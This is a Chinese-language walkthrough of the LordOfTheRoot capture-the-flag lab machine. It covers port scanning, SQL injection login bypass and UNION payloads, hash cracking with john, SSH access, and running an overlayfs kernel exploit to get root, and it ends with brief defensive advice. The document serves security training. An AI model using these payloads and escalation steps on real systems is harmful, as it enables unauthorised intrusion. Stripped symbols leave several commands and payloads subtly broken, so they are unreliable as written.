LordOfTheRoot靶机渗透测试实战与漏洞分析 1. 靶机环境概述LordOfTheRoot 1.0.1是Vulhub靶场中一个基于Ubuntu系统的渗透测试训练环境模拟了存在多重安全漏洞的Web服务器。这个靶机最显著的特点是采用了魔戒主题的登录界面实际包含SQL注入、权限提升等典型漏洞链。我在本地虚拟机VMware Workstation 16测试时分配2核CPU/4GB内存即可流畅运行。注意建议使用Kali Linux 2023.1作为攻击机其预装的Burp Suite Community 2023.5版本能完美兼容本靶场的漏洞利用2. 初始信息收集2.1 网络扫描与端口探测使用nmap进行全端口扫描的命令如下nmap -sS -p- -T4 192.168.1.103 -oN initial_scan.nmap典型扫描结果会显示22/tcp open ssh1337/tcp open http Apache 2.4.72.2 Web应用指纹识别通过Wappalyzer插件识别到服务器Apache 2.4.7 (Ubuntu)编程语言PHP 5.5.9前端框架jQuery 1.11.1关键发现/978345210/index.php页面存在登录表单页面源代码中发现注释!-- TODO: Remove test credentials before production -- !-- admin:MyPreciousR00t --3. SQL注入漏洞利用3.1 登录绕过攻击使用发现的测试凭证登录失败后在用户名栏尝试经典注入 or 11 --成功绕过登录进入后台可见系统未对输入进行任何过滤。3.2 数据库信息提取通过Burp Suite拦截修改请求使用以下注入语句获取数据库版本admin UNION SELECT 1,version(),3,4 --返回结果显示MySQL 5.5.44版本。3.3 表结构枚举分步执行以下语句获取关键表信息1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables WHERE table_schemadatabase() -- 1 UNION SELECT 1,column_name,3,4 FROM information_schema.columns WHERE table_nameusers --发现users表包含username和password字段。4. 权限提升路径4.1 密码哈希破解获取到的密码哈希格式为$1$VQ6a4lq5$X5aZ5J5L5Z5J5L5Z5J5L5使用john破解john --formatmd5crypt hash.txt --wordlist/usr/share/wordlists/rockyou.txt2小时内可破解出明文密码。4.2 SSH横向移动发现服务器开放SSH服务尝试使用破解的凭证登录ssh cracked_user192.168.1.103成功获取普通用户shell。5. 提权至root5.1 内核漏洞检测执行uname -a显示Linux 3.13.0-24-generic内核存在著名的overlayfs本地提权漏洞。5.2 漏洞利用实战下载编译公开的EXPgcc ofs.c -o ofs chmod x ofs ./ofs执行后成功获取root权限可在/root目录下找到flag文件。6. 防御建议输入验证$username mysqli_real_escape_string($conn, $_POST[username]);最小权限原则chmod 750 /var/www/html定期更新apt-get update apt-get upgrade -y7. 常见问题排查注入失败检查确认Burp Suite拦截模式为Intercept is on检查SQL语句中的空格是否被URL编码提权EXP无法运行apt-get install gcc linux-headers-$(uname -r)SSH连接超时ssh -o ConnectTimeout30 -v userip

相关新闻

最新新闻

SerenityOS 命令行选项解析指南:getopt 与 getopt_long 用法、返回值与底层实现

SerenityOS 命令行选项解析指南:getopt 与 getopt_long 用法、返回值与底层实现

SerenityOS 命令行选项解析指南:getopt 与 getopt_long 用法、返回值与底层实现 【免费下载链接】serenity The Serenity Operating System 🐞 项目地址: https://gitcode.com/GitHub_Trending/se/serenity 导读 本文以 getopt(3) 手册 为核心&a…

2026/9/28 1:37:33
轻量服务器还是ECS?大促云服务器选购与避坑实战指南

轻量服务器还是ECS?大促云服务器选购与避坑实战指南

每年大促节点,群里永远有人在问同一个问题:“38元的轻量服务器到底怎么抢?为什么我每次点进去都是已售罄?68元直购和99元的ECS我到底选哪个?”作为一个常年帮团队和自己采购云服务器的老用户,我太清楚这种纠…

2026/9/27 19:13:42
为 AI 代理的 Review 动作编写 Cedar 审批门控策略:review-agent-governance 策略编写实战指南

为 AI 代理的 Review 动作编写 Cedar 审批门控策略:review-agent-governance 策略编写实战指南

为 AI 代理的 Review 动作编写 Cedar 审批门控策略:review-agent-governance 策略编写实战指南 【免费下载链接】agents Multi-harness agentic plugin marketplace for Claude Code, Codex, Cursor, OpenCode, GitHub Copilot, and Google Antigravity 项目地址:…

2026/9/27 15:27:56
PaddleOCR 手写数学公式识别算法 CAN 实战指南:Counting-Aware Network 训练、评估与推理部署

PaddleOCR 手写数学公式识别算法 CAN 实战指南:Counting-Aware Network 训练、评估与推理部署

PaddleOCR 手写数学公式识别算法 CAN 实战指南:Counting-Aware Network 训练、评估与推理部署 【免费下载链接】PaddleOCR Turn any PDF or image document into structured data for your AI. A powerful, lightweight OCR toolkit that bridges the gap between i…

2026/9/27 19:54:03
Spring源码解析:构造器注入的类型转换与候选匹配机制

Spring源码解析:构造器注入的类型转换与候选匹配机制

/* MD / 富文本中的 .toc(含博客园搬家等嵌套结构);.toc-box 在侧栏,不受影响 */#content_views .toc,/* 编辑器常在目录前后插入空 p(:empty 仍占 20px),一并去掉避免顶空隙 */#content_views.markdown_views > p:empty:has(+ .toc),#content_views.markdown_views …

2026/9/28 17:20:49
openai-agents-python 多模型接入指南:深入解析 AnyLLMModel 适配层与 any-llm 路由

openai-agents-python 多模型接入指南:深入解析 AnyLLMModel 适配层与 any-llm 路由

openai-agents-python 多模型接入指南:深入解析 AnyLLMModel 适配层与 any-llm 路由 【免费下载链接】openai-agents-python A lightweight, powerful framework for multi-agent workflows 项目地址: https://gitcode.com/GitHub_Trending/op/openai-agents-pyth…

2026/9/28 2:08:29

日新闻

周新闻